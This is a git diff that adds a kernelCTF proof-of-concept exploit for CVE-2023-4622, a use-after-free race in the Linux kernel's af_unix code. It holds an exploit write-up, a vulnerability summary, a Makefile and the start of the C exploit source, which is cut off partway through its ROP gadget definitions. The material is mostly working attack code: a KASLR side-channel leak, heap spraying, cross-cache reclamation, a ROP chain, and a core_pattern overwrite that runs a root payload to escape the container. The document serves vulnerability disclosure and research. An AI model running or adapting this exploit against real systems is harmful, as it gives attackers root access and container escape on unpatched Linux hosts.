diff --git a/pocs/linux/kernelctf/CVE-2023-4622_cos/docs/exploit.md b/pocs/linux/kernelctf/CVE-2023-4622_cos/docs/exploit.md new file mode 100644 index 00000000..e9b4729c --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4622_cos/docs/exploit.md @@ -0,0 +1,465 @@ +# Exploit Tech Overview + +The vulnerability is race between unix_gc with unix_stream_sendpage. +Because `unix_stream_sendpage` grab skb without lock. It give unix_gc the chance to conccurent do operation on the sk_receive_queue. +We use timerfd to raise exception handler to extend the race windows, buy more time for unix_gc to free skb and let us cross-cache and spray. +```C +static ssize_t unix_stream_sendpage(struct socket *socket, struct page *page, + int offset, size_t size, int flags) +{ + ... + + skb = skb_peek_tail(&other->sk_receive_queue); //nolock and peek the tail skb + if (tail && tail == skb) { + skb = newskb; + } else if (!skb || !unix_skb_scm_eq(skb, &scm)) { + if (newskb) { + skb = newskb; + } else { + tail = skb; + goto alloc_skb; + } + } else if (newskb) { + /* this is fast path, we don't necessarily need to + * call to kfree_skb even though with newskb == NULL + * this - does no harm + */ + consume_skb(newskb); + newskb = NULL; + } + // timerfd expire to raise exception handler here, at same time unix_gc is doing free the skb we grabed before + if (skb_append_pagefrags(skb, page, offset, size)) { + tail = skb; + goto alloc_skb; + } +``` + +Since skb is freed before enter function `skb_append_pagefrags`. We can forge skb's contents to our control data. +Using this vulnerability, we can insert a skb_frag on an arbitrary kernel address by the following calling path +skb_append_pagefrags -> skb_fill_page_desc_noacc -> __skb_fill_page_desc_noacc. + +```C +static inline void __skb_fill_page_desc_noacc(struct skb_shared_info *shinfo, + int i, struct page *page, + int off, int size) +{ + skb_frag_t *frag = &shinfo->frags[i]; + + /* + * Propagate page pfmemalloc to the skb if we can. 
The problem is + * that not all callers have unique ownership of the page but rely + * on page_is_pfmemalloc doing the right thing(tm). + */ + frag->bv_page = page; + frag->bv_offset = off; + skb_frag_size_set(frag, size); +} + +``` + +According to the skb_frag_t struct layout, bv_offset is more controllable and it's value is between 0 to 0xfff. +We are interested when value is 0, because we can use choose to null first few bytes of a kernel address. +In this case, `struct msg_msg` become our target object again. +```C +typedef struct bio_vec skb_frag_t; +struct bio_vec { + struct page * bv_page; /* 0 8 */ + unsigned int bv_len; /* 8 4 */ + unsigned int bv_offset; /* 12 4 */ + + /* size: 16, cachelines: 1, members: 3 */ + /* last cacheline: 16 bytes */ +}; +``` + +Let's take a look into msg_msg struct layout and a sample memory layout of msg_msgs + +```C +struct msg_msg { + struct list_head { + struct list_head * next; /* 0 8 */ + struct list_head * prev; /* 8 8 */ + } m_list; /* 0 16 */ + long int m_type; /* 16 8 */ + /* typedef size_t -> __kernel_size_t -> __kernel_ulong_t */ long unsigned int m_ts; /* 24 8 */ + struct msg_msgseg * next; /* 32 8 */ + void * security; /* 40 8 */ + + /* size: 48, cachelines: 1, members: 5 */ + /* last cacheline: 48 bytes */ +}; +``` + +``` +0xffff8880082e2380: 0xffff888008705080 0xffff888007ebf680 //m_list.next m_list.prev +0xffff8880082e2390: 0x000000000000008b 0x0000000000000050 //m_type m_ts +0xffff8880082e23a0: 0x0000000000000000 0x0000000000000000 //next security +0xffff8880082e23b0: 0x0000000000000408 0x0000000000000000 //data +0xffff8880082e23c0: 0x0000001000000000 0x0000000000000000 +0xffff8880082e23d0: 0x0000000000000000 0x0000000000000000 +0xffff8880082e23e0: 0x0000000000000000 0x0000000000000000 +0xffff8880082e23f0: 0x0000000000000000 0x0000000000000000 +0xffff8880082e2400: 0xffff888008705f80 0xffff888007ebf800 //m_list.next m_list.prev +0xffff8880082e2410: 0x000000000000008b 0x0000000000000050 //m_type m_ts 
+0xffff8880082e2420: 0x0000000000000000 0x0000000000000000 //next security +0xffff8880082e2430: 0x0000000000000412 0x0000000000000000 //data +0xffff8880082e2440: 0x0000001000000000 0x0000000000000000 +0xffff8880082e2450: 0x0000000000000000 0x0000000000000000 +0xffff8880082e2460: 0x0000000000000000 0x0000000000000000 +0xffff8880082e2470: 0x0000000000000000 0x0000000000000000 +``` + +If we choose (0xffff8880082e2400+2-0x10) as our skb_frag_t, after return from function `__skb_fill_page_desc_noacc`, the above memory layout will become as follow +``` +0xffff8880082e2380: 0xffff888008705080 0xffff888007ebf680 //m_list.next m_list.prev +0xffff8880082e2390: 0x000000000000008b 0x0000000000000050 //m_type m_ts +0xffff8880082e23a0: 0x0000000000000000 0x0000000000000000 //next security +0xffff8880082e23b0: 0x0000000000000408 0x0000000000000000 //data +0xffff8880082e23c0: 0x0000001000000000 0x0000000000000000 +0xffff8880082e23d0: 0x0000000000000000 0x0000000000000000 +0xffff8880082e23e0: 0x0000000000000000 0x0000000000000000 +0xffff8880082e23f0: 0xea00001223400000 0x000000001000ffff +0xffff8880082e2400: 0xffff888008700000 0xffff888007ebf800 //m_list.next m_list.prev +0xffff8880082e2410: 0x000000000000008b 0x0000000000000050 //m_type m_ts +0xffff8880082e2420: 0x0000000000000000 0x0000000000000000 //next security +0xffff8880082e2430: 0x0000000000000412 0x0000000000000000 //data +0xffff8880082e2440: 0x0000001000000000 0x0000000000000000 +0xffff8880082e2450: 0x0000000000000000 0x0000000000000000 +0xffff8880082e2460: 0x0000000000000000 0x0000000000000000 +0xffff8880082e2470: 0x0000000000000000 0x0000000000000000 +``` + +m_list.next first two byte has been overwrite to null byte and make it point to another msg_msg. +With two msg_msg->m_list.next point to same address, we can use known exploit tech to achieve container escape. 
+ + +# Exploit Tech Detail + +The exploit consists of the following steps: +* EntryBleed: Breaking KASLR under KPTI with Prefetch (CVE-2022-4543) +* Prepare timerfd +* Spray large amount msg_msg +* Prepare refcount circle to make unix_gc free skbs +* Race between unix_gc with unix_stream_sendpage +* Reclaim SKB with pipe page buffer +* msg_msg exploit technique +* Achieve container escape. + +The most unreliable and hardest step to get right is `Race between unix_gc with unix_stream_sendpage`. +Because we lack the information needed to place the timeout at exactly the right nanosecond, we tried values from 200 to 4096. +Depending on how lucky we are, we might hit the right spot within a few minutes or still be failing after half an hour. +To trigger the vulnerability more easily, we recommend applying the following patch to the Linux kernel. + +```diff +diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c +index 5b19b6c53..3bdc0aa94 100644 +--- a/net/unix/af_unix.c ++++ b/net/unix/af_unix.c +@@ -2347,7 +2347,7 @@ static ssize_t unix_stream_sendpage(struct socket *socket, struct page *page, + consume_skb(newskb); + newskb = NULL; + } +- ++ mdelay(10); + if (skb_append_pagefrags(skb, page, offset, size)) { + tail = skb; + goto alloc_skb; +``` + + +## EntryBleed: Breaking KASLR under KPTI with Prefetch (CVE-2022-4543) +We use this technique to bypass KASLR. With it we are able to predict/guess the physmap address of the msg_msg object in the kernel heap. Our exploit also uses this technique to get the kernel .text address, but that value is corrected later, once we leak the kernel .text address via pipe_buffer, to make it more reliable. You can find the details about this technique [here](https://www.willsroot.io/2022/12/entrybleed.html). + +## Prepare timerfd +We adopt the exploit technique from Jann's blog post `Racing against the clock -- hitting a tiny kernel race window` to extend the race window. +To make the race window larger on kernels without CONFIG_PREEMPT:
+* make a timerfd expire in that window (which will run in an interrupt handler - in other words, in hardirq context) +* make sure that the wakeup triggered by the timerfd has to churn through many waitqueue items created by epoll + +The function `do_epoll_enqueue` in our exploit code does exactly this: +```C +void do_epoll_enqueue(int fd) +{ + int cfd[2]; + socketpair(AF_UNIX, SOCK_STREAM, 0, cfd); + for (int k = 0; k < 0x4; k++) + { + if (fork() == 0) + { + for (int i = 0; i < 0x100; i++) + { + timefds[i] = SYSCHK(dup(fd)); + } + for (int i = 0; i < 0xc0; i++) + { + epfds[i] = SYSCHK(epoll_create(0x1)); + } + for (int i = 0; i < 0xc0; i++) + { + for (int j = 0; j < 0x100; j++) + { + // queue as many as possible async waiters at timerfd waitqueue + epoll_ctl_add(epfds[i], timefds[j], 0); + } + } + write(cfd[1], buf, 1); + raise(SIGSTOP); // stop here for nothing and just keep epoll alive + } + // sync to make sure it has queue what we need + read(cfd[0], buf, 1); + } + close(cfd[0]); + close(cfd[1]); +} +``` +## Spray large amount msg_msg +To bypass KASLR we use EntryBleed to guess the physmap address of a msg_msg in the kernel heap. To make this more stable, +we spray a large number of msg_msg objects in the kernel heap to increase the probability that the guessed kernel address is a msg_msg object. +In total we spray 794MB of data, which is enough to perform the exploitation on a kernelCTF instance with 4GB of RAM. +The following code sets up and sprays the kernel heap with msg_msg.
+ +```c +#define NUM_QUEUE_MAX 32000 +#define NUM_QUEUE_RESV 100 // reserved for exploitation +#define NUM_QUEUE (NUM_QUEUE_MAX - NUM_QUEUE_RESV) +#define NUM_MSG 204 // calculated from 16384 (max bytes in queue) / MSG_SIZE +#define CHUNK_SIZE 0x80 +#define MSG_SIZE (CHUNK_SIZE - 0x30) + +// Spray as many msg_msgs as possible to full the kernel heap memory +// For 4 GB RAM system, we spray NUM_QUEUE * NUM_MSG * CHUNK_SIZE = 794 MB msg_msg +// It's enough for us to analyze and make our choose kernel address become a msg_msg. +int setup_msg() +{ + msqid = malloc(sizeof(*msqid) * 40000); + hackq = malloc(sizeof(*msqid) * NUM_QUEUE_RESV); + printf("setup msg start..\n"); + memset(&msg.mtext[0], 0, 0x2000); + msg.mtype = 1; + system("ipcrm --all=msg"); + for (int i = 0; i < NUM_QUEUE; i++) + { + msqid[i] = msgget(IPC_PRIVATE, 0644 | IPC_CREAT); + SYSCHK(msqid[i]); + } + for (int i = 0; i < NUM_QUEUE_RESV; i++) + { + hackq[i] = msgget(IPC_PRIVATE, 0644 | IPC_CREAT); + SYSCHK(hackq[i]); + } + // Fake `struct skb_shared_info` in the data of msg_msg + // We will choose a specific kernel heap address as `skb_shinfo(skb)` + msg.mtext[0x44 - 0x30] = '\x10'; // nr_frags + for (int j = 0; j < NUM_MSG; j++) + { + for (int i = 0; i < NUM_QUEUE; i++) + { + *(size_t *)&msg.mtext[0] = i; // queue identifier stored here + msg.mtype = j + 1; // msg index identifier + SYSCHK(msgsnd(msqid[i], &msg, MSG_SIZE, IPC_NOWAIT)); + } + } + printf("setup msg done\n"); +} +``` +We create a fixed number of message queues and send a fixed number of msg_msg objects into each allocated message queue. +In every message we store a queue identifier and a message identifier that will be useful during exploitation, for example +to detect the corrupted message queue and to perform msg_msg "feng shui" accurately and reliably. +The queue identifier records which queue the message is in. The msg identifier records the message's position within that queue.
+ +## Prepare refcount circle to make unix_gc free skbs +We need to make unix_gc detect a refcount circle (i.e. a reference cycle) and perform garbage collection to clear the selected unix sockets' sk_receive_queue. +Create two pairs of unix sockets named A, B, C and D. A's unix_peer is B and C's unix_peer is D. +Sending C to A makes B's sk_receive_queue hold a refcount of C. +Sending B to D makes C's sk_receive_queue hold a refcount of B. +B and C then form a refcount circle, and unix_gc will clear these sk_receive_queues when it is triggered. + +In this step we also send a lot of skbs so that the use-after-free can be exploited with a cross-cache attack, letting us reclaim the UAF object with our own controlled data later. + +The following code snippet does this. +```C + SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, fds)); + A = fds[0]; + B = fds[1]; + SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, fds)); + C = fds[0]; + D = fds[1]; + + // Max the socket send/recv buffer, because we need to spray a certain number skb + // For heap cross cache attack + size_t val = 0x400000; + SYSCHK(SYSCHK(setsockopt(D, SOL_SOCKET, SO_SNDBUF, &val, 4))); + SYSCHK(SYSCHK(setsockopt(A, SOL_SOCKET, SO_SNDBUF, &val, 4))); + SYSCHK(SYSCHK(setsockopt(B, SOL_SOCKET, SO_RCVBUF, &val, 4))); + SYSCHK(SYSCHK(setsockopt(C, SOL_SOCKET, SO_RCVBUF, &val, 4))); + + // Spray a lot skb a head for heap feng shui + *(int *)CMSG_DATA(cmsg) = C; + for (int i = 0; i < 0x100; i++) + SYSCHK(sendmsg(D, &msg, 0)); + + // Make B's recv buffer hold C, datapipe and signalpipe refcount + cmsg->cmsg_len = CMSG_LEN(sizeof(int) * 3); + msg.msg_controllen = cmsg->cmsg_len; + ((int *)CMSG_DATA(cmsg))[0] = signalpipe[1]; //when release this file, spray_pipe_page_thread will wake up when CPU#1 has free cpu time.
+ ((int *)CMSG_DATA(cmsg))[1] = datapipe[1]; // when release this file, because pipe lock is hold in splice, it will sleep and let CPU#1 to context switch + ((int *)CMSG_DATA(cmsg))[2] = C; + SYSCHK(sendmsg(A, &msg, 0)); + + // decrease unnecessary refcount + close(signalpipe[1]); + close(datapipe[1]); + + // Make C's recv buffer hold B refcount + cmsg->cmsg_len = CMSG_LEN(sizeof(int)); + msg.msg_controllen = cmsg->cmsg_len; + *(int *)CMSG_DATA(cmsg) = B; + SYSCHK(sendmsg(D, &msg, 0)); + + // Spray a lot skb at tail for heap feng shui + *(int *)CMSG_DATA(cmsg) = C; + for (int i = 0; i < 0x100; i++) + SYSCHK(sendmsg(D, &msg, 0)); + + // decrease unnecessary refcount + close(B); + close(C); +``` + +## Race between unix_gc with unix_stream_sendpage +Init two threads to race between unix_gc with unix_stream_sendpage. + +Function `trigger_unix_stream_sendpage` in our exploit code will setup a timeout in nanosecond and use system call splice to insert a pipe page to unix_socket. +It will call unix_stream_sendpage to reach our vulnerable function. +```C +void *trigger_unix_stream_sendpage(void *x) +{ + set_cpu(0); + // setup a certain timeout nanosecond + struct itimerspec new = {.it_value.tv_nsec = timeout}; + // Send signal to trigger_unix_gc_thread + write(sync_job[1], "H", 1); + SYSCHK(timerfd_settime(tfd, TFD_TIMER_CANCEL_ON_SET, &new, NULL)); + splice(datapipe[0], 0, A, 0, 0x1000, 0); + close(datapipe[0]); + return NULL; +} + +``` +Function `trigger_unix_gc_thread` in our exploit code will trigger unix_gc by release a unused unix socket. +It will detect our prepared refcount circle and clear these sk_receive_queue. +```C +void *trigger_unix_gc_thread(void *x) +{ + set_cpu(1); + int s = socket(AF_UNIX, SOCK_STREAM, 0); + read(sync_job[0], &x, 1); + // Release a unix socket will trigger unix_gc + close(s); + return NULL; +} +``` + +## Reclaim SKB with pipe page buffer +We need to perform cross cache attack to reclaim skb with our own controlled data. 
This time we use [pipe page buffer](https://elixir.bootlin.com/linux/latest/source/fs/pipe.c#L498) to reclaim the skb and control the skb contents. +This is performed by `spray_pipe_page_thread` in a separate thread. + +```c +void *spray_pipe_page_thread(void *x) +{ + set_cpu(1); + // After unix_gc clean skb, this thread will wakeup and start spray pipe page. + read(signalpipe[0], buf, 1); + for (int i = 0; i < 0x100; i++) + for (int j = 0; j < 0x10; j++) + write(spray_pipe[i][1], spray_data, 0x1000); + + return NULL; +} + +#define FIXED_OFFSET 0x140000000 +#define PAGE_OFFSET_BASE (LEAKED_KHEAP - FIXED_OFFSET) +#define TARGET_PHYS_ADDR 0x82e2380 +#define PHYS_ADDR_MSG (PAGE_OFFSET_BASE + TARGET_PHYS_ADDR) // guessed msg_msg address + +// spray data +int main(...) { + ... + // Prepare spray data for reallocate freed skb as pipe page data. + // Craft skb->head and skb->end to control skb_shinfo pointer + for (int i = 0; i < 0x10; i++) + { + *(size_t *)&spray_data[i * 0x100 + 0xc8] = PHYS_ADDR_MSG; // skb->head + *(size_t *)&spray_data[i * 0x100 + 0xc0] = 0x42; // skb->end + } + ... +} +``` + +## msg_msg exploit technique +This primitive lets us partially overwrite msg.m_list.next of a msg we sprayed with `0000`. This makes two msg_msg objects in different message queues +point to the same msg_msg object. +After the bug is triggered, the exploit checks whether there is a corrupted message in the queues. We traverse every message +in every queue to check its identifier. We retrieve the j-th msg in the i-th queue and compare it against the identifier stored in the retrieved msg object; +if they differ, we know this msg will act as the "victim" msg, because it is pointed to by two other msgs (via m_list.next) and we can +perform msg_msg "feng shui" here. + +The exploit then performs "feng shui" on the msg_msg objects. First we leak kernel heap addresses: the address of the prepared ROP payload and the address of a pipe_buffer in +kmalloc-1024.
Then, we perform the known arbitrary-free technique on pipe_buffer using `msg.security`, bypassing `list_del` (with CONFIG_DEBUG_LIST=y) +(https://github.com/star-sg/security-research/blob/CVE-2023-4622/pocs/linux/kernelctf/CVE-2023-3390_lts_cos_mitigation/docs/novel-techniques.md#config_debug_list-leading-to-expand-vulnerabilitys-capability). + +We overwrite the pipe_buffer object with a stack pivot gadget; after we close all the pipes, the kernel executes the stack pivot gadget and finally lands on the ROP chain that was generated earlier. + +## Achieve container escape. + +Once we control the kernel RIP, we use the crafted ROP chain to overwrite core_pattern with `|/proc/%P/fd/666`: + +We then use memfd to place an executable payload at fd 666. +```C +int check_core() +{ + // Check if /proc/sys/kernel/core_pattern has been overwritten + char buf[0x100] = {}; + int core = open("/proc/sys/kernel/core_pattern", O_RDONLY); + read(core, buf, sizeof(buf)); + close(core); + return strncmp(buf, "|/proc/%P/fd/666", 0x10) == 0; +} +void crash(char *cmd) +{ + int memfd = memfd_create("", 0); + SYSCHK(sendfile(memfd, open("root", 0), 0, 0xffffffff)); + dup2(memfd, 666); + close(memfd); + while (check_core() == 0) + sleep(1); + *(size_t *)0 = 0; +} +``` + +Later, when a coredump happens, the kernel executes our executable file as root in the root namespace: +```C +*(size_t*)0=0; //trigger coredump +``` + +The executable file `root` is used to spawn a shell when the coredump happens.
This is what the code looks like: +```c++ +void* job(void* x){ + FILE* fp = popen("pidof billy","r"); + fread(buf,1,0x100,fp); + fclose(fp); + int pid = strtoull(buf,0,10); + sprintf(path,"/proc/%d/ns/net",pid); + int pfd = syscall(SYS_pidfd_open,pid,0); + int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0); + int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0); + int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0); + dup2(stdinfd,0); + dup2(stdoutfd,1); + dup2(stderrfd,2); + system("cat /flag;echo o>/proc/sysrq-trigger"); +} +int main(int argc,char** argv){ + job(0); +} +``` diff --git a/pocs/linux/kernelctf/CVE-2023-4622_cos/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2023-4622_cos/docs/vulnerability.md new file mode 100644 index 00000000..2832504f --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4622_cos/docs/vulnerability.md @@ -0,0 +1,14 @@ +- Requirements: + - Capabilities: NA + - Kernel configuration: CONFIG_UNIX=y + - User namespaces required: No +- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=869e7c62486e +- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?h=linux-6.1.y&id=790c2f9d15b594350ae9bca7b236f2b1859de02c +- Affected Version: v4.2 - v6.4 +- Affected Component: af_unix +- Syscall to disable: splice +- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4622 +- Cause: Use-After-Free +- Description: A use-after-free vulnerability exists in the Linux kernel's af_unix component. unix_stream_sendpage() tries to add data to the last skb in the peer's +recv queue without locking the queue. So, there is a race where unix_stream_sendpage() could access an skb locklessly that is being +released by garbage collection, resulting in use-after-free. We recommend upgrading past commit 790c2f9d15b594350ae9bca7b236f2b1859de02c.
\ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/Makefile b/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/Makefile new file mode 100644 index 00000000..f02edb63 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/Makefile @@ -0,0 +1,12 @@ +exploit: poc root run.sh + tar czf ./poc.tar.gz poc root + cp run.sh exploit + fallocate -l 512 exploit + dd if=poc.tar.gz of=exploit conv=notrunc oflag=append + +poc: poc.c + gcc -o poc poc.c -static -pthread +root: root.c + gcc -o root root.c -static +clean: + rm -rf poc root exploit poc.tar.gz diff --git a/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/exploit b/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/exploit new file mode 100755 index 00000000..2c3c3f2e Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/poc b/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/poc new file mode 100755 index 00000000..616b7225 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/poc differ diff --git a/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/poc.c b/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/poc.c new file mode 100644 index 00000000..8a71d245 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/poc.c @@ -0,0 +1,765 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define SYSCHK(x) ({ \ + typeof(x) __res = (x); \ + if (__res == (typeof(x))-1) \ + err(1, 
"SYSCHK(" #x ")"); \ + __res; \ +}) +char y[2]; +#define PAUSE \ + { \ + printf(":"); \ + read(0, y, 1); \ + } +size_t gettime(); +char buf[0x1000]; +int timefds[0x1000]; +int epfds[0x1000]; +size_t timeout = 200; +int fds[2]; +int A, B, C, D; +char data[0x1000]; +int sync_job[2]; +int signalpipe[2]; +int datapipe[2]; +int spray_pipe[0x100][2]; +int spray_pipe2[0x400][2]; + +int tfd; +char spray_data[0x1000]; +int *msqid; +int *hackq; + +struct +{ + long mtype; + char mtext[0x2000]; +} msg; + +#define KERNEL_LOWER_BOUND 0xffffffff80000000ull +#define KERNEL_UPPER_BOUND 0xffffffffc0000000ull + +#define STEP_KERNEL 0x100000ull +#define SCAN_START_KERNEL KERNEL_LOWER_BOUND +#define SCAN_END_KERNEL KERNEL_UPPER_BOUND +#define ARR_SIZE_KERNEL (SCAN_END_KERNEL - SCAN_START_KERNEL) / STEP_KERNEL + +#define PHYS_LOWER_BOUND 0xffff888000000000ull +#define PHYS_UPPER_BOUND 0xfffffe0000000000ull + +#define STEP_PHYS 0x40000000ull +#define SCAN_START_PHYS PHYS_LOWER_BOUND +#define SCAN_END_PHYS PHYS_UPPER_BOUND +#define ARR_SIZE_PHYS (SCAN_END_PHYS - SCAN_START_PHYS) / STEP_PHYS + +#define DUMMY_ITERATIONS 5 +#define ITERATIONS 100 + +uint64_t kaslr; +uint64_t phys; + +// https://www.willsroot.io/2022/12/entrybleed.html +uint64_t sidechannel(uint64_t addr) +{ + uint64_t a, b, c, d; + asm volatile(".intel_syntax noprefix;" + "mfence;" + "rdtscp;" + "mov %0, rax;" + "mov %1, rdx;" + "xor rax, rax;" + "lfence;" + "prefetchnta qword ptr [%4];" + "prefetcht2 qword ptr [%4];" + "xor rax, rax;" + "lfence;" + "rdtscp;" + "mov %2, rax;" + "mov %3, rdx;" + "mfence;" + ".att_syntax;" + : "=r"(a), "=r"(b), "=r"(c), "=r"(d) + : "r"(addr) + : "rax", "rbx", "rcx", "rdx"); + a = (b << 32) | a; + c = (d << 32) | c; + return c - a; +} + +uint64_t prefetch(int phys) +{ + uint64_t arr_size = ARR_SIZE_KERNEL; + uint64_t scan_start = SCAN_START_KERNEL; + uint64_t step_size = STEP_KERNEL; + if (phys) + { + arr_size = ARR_SIZE_PHYS; + scan_start = SCAN_START_PHYS; + step_size = STEP_PHYS; + } + + 
uint64_t *data = malloc(arr_size * sizeof(uint64_t)); + memset(data, 0, arr_size * sizeof(uint64_t)); + + uint64_t min = ~0, addr = ~0; + + for (int i = 0; i < ITERATIONS + DUMMY_ITERATIONS; i++) + { + for (uint64_t idx = 0; idx < arr_size; idx++) + { + uint64_t test = scan_start + idx * step_size; + syscall(104); + uint64_t time = sidechannel(test); + if (i >= DUMMY_ITERATIONS) + data[idx] += time; + } + } + + for (int i = 0; i < arr_size; i++) + { + data[i] /= ITERATIONS; + if (data[i] < min) + { + min = data[i]; + addr = scan_start + i * step_size; + } + } + + free(data); + + return addr; +} + +size_t KERNEL_BASE = 0xffffffff81000000; +size_t LEAKED_KHEAP = 0xffff888140000000; + +// simple most frequent value in array algorithm +size_t mostFrequent(size_t *arr, size_t n) +{ + // code here + size_t maxcount = 0; + size_t element_having_max_freq; + for (int i = 0; i < n; i++) + { + size_t Count = 0; + for (int j = 0; j < n; j++) + { + if (arr[i] == arr[j]) + Count++; + } + + if (Count > maxcount) + { + maxcount = Count; + element_having_max_freq = arr[i]; + } + } + + return element_having_max_freq; +} +// Since there no KPTI on the remote server (as its CPU is not affected by Meltdown, so the kernel does not turn on KPTI) +// so this is actually prefetch attack. 
ref: https://gruss.cc/files/prefetch.pdf +void leak() +{ + size_t kbase[0x8] = {0}; + size_t kheap[0x8] = {0}; + for (int i = 0; i < 0x8; i++) + { + kbase[i] = prefetch(0) - 0x1600000; + kheap[i] = prefetch(1); + printf("0x%lx 0x%lx\n", kbase[i], kheap[i]); + } + KERNEL_BASE = mostFrequent(kbase, 8); + LEAKED_KHEAP = mostFrequent(kheap, 8); + printf("choose 0x%lx 0x%lx\n", KERNEL_BASE, LEAKED_KHEAP); +} + +#define FIXED_OFFSET 0x140000000 +#define PAGE_OFFSET_BASE (LEAKED_KHEAP - FIXED_OFFSET) // physmap base of physical address 0x0 +#define TARGET_PHYS_ADDR 0x82e2380 // high probability addr we found msg_msg after spray 794MB msg +#define PHYS_ADDR_MSG (PAGE_OFFSET_BASE + TARGET_PHYS_ADDR) + +#define NUM_QUEUE_MAX 32000 +#define NUM_QUEUE_RESV 100 // reserved for exploitation +#define NUM_QUEUE (NUM_QUEUE_MAX - NUM_QUEUE_RESV) +#define NUM_MSG 204 +#define CHUNK_SIZE 0x80 +#define MSG_SIZE (CHUNK_SIZE - 0x30) + +// Spray as many msg_msgs as possible to full the kernel heap memory +// For 4 GB RAM system, we spray NUM_QUEUE * NUM_MSG * CHUNK_SIZE = 794 MB msg_msg +// It's enough for us to analyze and make our choose kernel address become a msg_msg. +int setup_msg() +{ + msqid = malloc(sizeof(*msqid) * 40000); + hackq = malloc(sizeof(*msqid) * NUM_QUEUE_RESV); + printf("setup msg start..\n"); + memset(&msg.mtext[0], 0, 0x2000); + msg.mtype = 1; + // Removes all of the current user's previously allocated msg_msg structs to aviod reach limits. 
+ system("ipcrm --all=msg"); + for (int i = 0; i < NUM_QUEUE; i++) + { + msqid[i] = msgget(IPC_PRIVATE, 0644 | IPC_CREAT); + SYSCHK(msqid[i]); + } + for (int i = 0; i < NUM_QUEUE_RESV; i++) + { + hackq[i] = msgget(IPC_PRIVATE, 0644 | IPC_CREAT); + SYSCHK(hackq[i]); + } + // Fake `struct skb_shared_info` in the data of msg_msg + // We will choose a specific kernel heap address as `skb_shinfo(skb)` + msg.mtext[0x44 - 0x30] = '\x10'; // nr_frags + for (int j = 0; j < NUM_MSG; j++) + { + for (int i = 0; i < NUM_QUEUE; i++) + { + *(size_t *)&msg.mtext[0] = i; // queue identifier stored here + msg.mtype = j + 1; // msg index identifier + SYSCHK(msgsnd(msqid[i], &msg, MSG_SIZE, IPC_NOWAIT)); + } + } + printf("setup msg done\n"); +} + +#ifdef LTS +#define START_ROP 0x50 +#define STATIC_KBASE 0xffffffff81000000 +#define POP_RDI (KERNEL_BASE + (0xffffffff8112cfc0 - STATIC_KBASE)) // pop rdi ; ret +#define POP_RSI (KERNEL_BASE + (0xffffffff81064c7e - STATIC_KBASE)) // pop rsi ; ret +#define POP_RSI2 (KERNEL_BASE + (0xffffffff811ea35e - STATIC_KBASE)) // pop rsi ; mov eax, xxx ; ret +#define POP_RDX (KERNEL_BASE + (0xffffffff810bf3d2 - STATIC_KBASE)) // pop rdx ; ret +#define POP_RSP (KERNEL_BASE + (0xffffffff81027924 - STATIC_KBASE)) // pop rsp ; ret +#define PIVOT (KERNEL_BASE + (0xffffffff8198954b - STATIC_KBASE)) // push rsi ; jmp qword ptr [rsi + 0x39] +#define PIVOT2 (KERNEL_BASE + (0xffffffff8112cfbe - STATIC_KBASE)) // pop rsp ; pop r15 ; ret +#define PIVOT3 (KERNEL_BASE + (0xffffffff81c53eb4 - STATIC_KBASE)) // push rsi ; jmp qword ptr [rsi + 0x2e] +#define CORE_PATTERN (KERNEL_BASE + (0xffffffff837ba460 - STATIC_KBASE)) +#define COPY_FROM_USER (KERNEL_BASE + (0xffffffff8186e280 - STATIC_KBASE)) +#define MSLEEP (KERNEL_BASE + (0xffffffff812292e0 - STATIC_KBASE)) +#define ANON_PIPE_BUF_OPS_OFF (0xffffffff82a1cf80 - STATIC_KBASE) +#else +#define START_ROP 0x50 +#define STATIC_KBASE 0 +#define POP_RDI (KERNEL_BASE + (0x012001cc - STATIC_KBASE)) // pop rdi ; ret +#define 
